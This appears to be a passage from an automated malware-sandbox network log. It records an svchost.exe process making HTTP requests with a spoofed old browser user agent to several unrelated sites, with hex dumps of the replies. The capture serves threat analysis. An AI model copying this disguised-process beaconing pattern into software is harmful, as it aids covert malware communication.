                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC973INData Raw: 31 65 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62
                                                                                                                                                                                                                                                                                                      Data Ascii: 1e93<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatib
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC973INData Raw: 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69
                                                                                                                                                                                                                                                                                                      Data Ascii: le" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <di
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC974INData Raw: 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 57 41 49 5a 73 79 5f 61 6d 73 56 76 5a 4b 4b 35 5a 61 78 59 49 54 78 38 62 62 36 30 71 38 76 78 45 46 65 77 72 4c 69 66 31 58 6b 2d 31 36 37 39 34 36 30 33 33 33 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77
                                                                                                                                                                                                                                                                                                      Data Ascii: .com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=WAIZsy_amsVvZKK5ZaxYITx8bb60q8vxEFewrLif1Xk-1679460333-0-gaNycGzNCPs" method="POST" enctype="application/x-www
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC975INData Raw: 74 6d 7a 72 30 56 48 4b 47 39 5a 64 38 52 69 5a 42 34 35 50 62 61 69 62 39 74 42 7a 68 48 73 5f 39 4f 76 4d 53 75 4f 59 37 44 54 74 52 37 42 4b 6a 67 4e 68 56 4c 43 72 36 78 4f 38 37 38 4b 43 6d 64 35 6d 35 4a 69 39 43 68 48 57 67 79 39 36 48 49 59 42 33 78 2d 46 57 32 32 71 4b 4a 49 35 6f 4b 66 71 71 61 70 61 74 38 49 67 52 4d 70 61 31 4c 5f 61 65 57 57 4a 58 33 53 74 54 39 37 65 58 54 36 38 74 52 33 45 62 55 55 34 66 6c 33 6e 49 6f 31 4a 48 79 76 39 62 48 63 47 37 32 76 5a 56 73 44 70 79 78 69 47 4b 5f 54 4a 31 4a 67 58 67 43 30 6c 47 6c 4a 68 42 44 4d 74 31 49 6e 69 79 67 71 44 62 4f 6f 4b 31 38 6c 33 50 68 6b 57 63 5a 6a 32 36 4c 78 57 6f 48 41 5a 79 47 76 4c 70 49 77 5a 30 4b 64 4e 6c 75 64 76 71 6a 4b 35 49 30 39 49 4b 64 6b 4c 4d 6e 4d 52 44 5f 33
                                                                                                                                                                                                                                                                                                      Data Ascii: tmzr0VHKG9Zd8RiZB45Pbaib9tBzhHs_9OvMSuOY7DTtR7BKjgNhVLCr6xO878KCmd5m5Ji9ChHWgy96HIYB3x-FW22qKJI5oKfqqapat8IgRMpa1L_aeWWJX3StT97eXT68tR3EbUU4fl3nIo1JHyv9bHcG72vZVsDpyxiGK_TJ1JgXgC0lGlJhBDMt1IniygqDbOoK18l3PhkWcZj26LxWoHAZyGvLpIwZ0KdNludvqjK5I09IKdkLMnMRD_3
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC977INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 5a 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 33 35 39 35 34 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 39 32 39 63 65 38 32 39 31 38 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 31 39 63 32 61 37 35 36 63 31 62 63 65 63 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 57 41 49 5a 73 79 5f 61 6d 73 56 76 5a 4b 4b 35 5a 61 78 59 49 54 78 38 62 62 36 30 71 38 76 78 45 46 65 77 72 4c 69 66 31 58 6b 2d 31 36 37 39 34
                                                                                                                                                                                                                                                                                                      Data Ascii: cZone: 'sigtoa.com', cType: 'managed', cNounce: '35954', cRay: '7abbc929ce82918c', cHash: '19c2a756c1bcec5', cUPMDTk: "\/?__cf_chl_tk=WAIZsy_amsVvZKK5ZaxYITx8bb60q8vxEFewrLif1Xk-16794
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC978INData Raw: 20 20 20 20 20 6d 3a 20 27 45 2f 32 42 32 49 4f 75 71 71 6b 66 57 56 58 75 78 55 4e 55 36 47 4c 6b 48 67 45 74 4f 65 51 38 6b 30 51 69 42 32 4a 4e 2f 56 30 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 2f 37 54 4d 5a 6c 6c 52 69 4b 5a 7a 62 70 68 42 6d 38 62 56 31 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 69 38 49 30 44 2f 59 2f 41 4a 36 78 32 72 4a 33 55 31 43 4f 46 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c
                                                                                                                                                                                                                                                                                                      Data Ascii: m: 'E/2B2IOuqqkfWVXuxUNU6GLkHgEtOeQ8k0QiB2JN/V0=', i1: '/7TMZllRiKZzbphBm8bV1Q==', i2: 'i8I0D/Y/AJ6x2rJ3U1COFg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC980INData Raw: 61 6d 73 56 76 5a 4b 4b 35 5a 61 78 59 49 54 78 38 62 62 36 30 71 38 76 78 45 46 65 77 72 4c 69 66 31 58 6b 2d 31 36 37 39 34 36 30 33 33 33 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61
                                                                                                                                                                                                                                                                                                      Data Ascii: amsVvZKK5ZaxYITx8bb60q8vxEFewrLif1Xk-1679460333-0-gaNycGzNCPs" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('hea
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC980INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      55192.168.2.52003749.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC939OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      56192.168.2.520825104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC985OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      Cookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4rlbhkzysBBTuUOMlMpEfoSaAhKsNoIZ9lU9bf1gHrdJYJM5pnKdnH%2Be%2BOZjMI2AyoyPA4Ho2h5hX066tSNf8C8RvzHfLFcDPQ1DC7u1s2EhyPShWvXshgKaw72FmeB7HD86xXMgXeU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc92c2bb72c62-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC991INData Raw: 37 63 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 7cb3<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC992INData Raw: 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engines/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templates/
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC993INData Raw: 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69
                                                                                                                                                                                                                                                                                                      Data Ascii: tools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.mi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC994INData Raw: 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79 20 73
                                                                                                                                                                                                                                                                                                      Data Ascii: /nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry s
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC996INData Raw: 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC997INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                                      Data Ascii: menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC998INData Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69
                                                                                                                                                                                                                                                                                                      Data Ascii: ></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-ti
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1000INData Raw: 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                                      Data Ascii: -item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-conte
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1001INData Raw: 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20
                                                                                                                                                                                                                                                                                                      Data Ascii: content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1002INData Raw: 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: ef="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul>
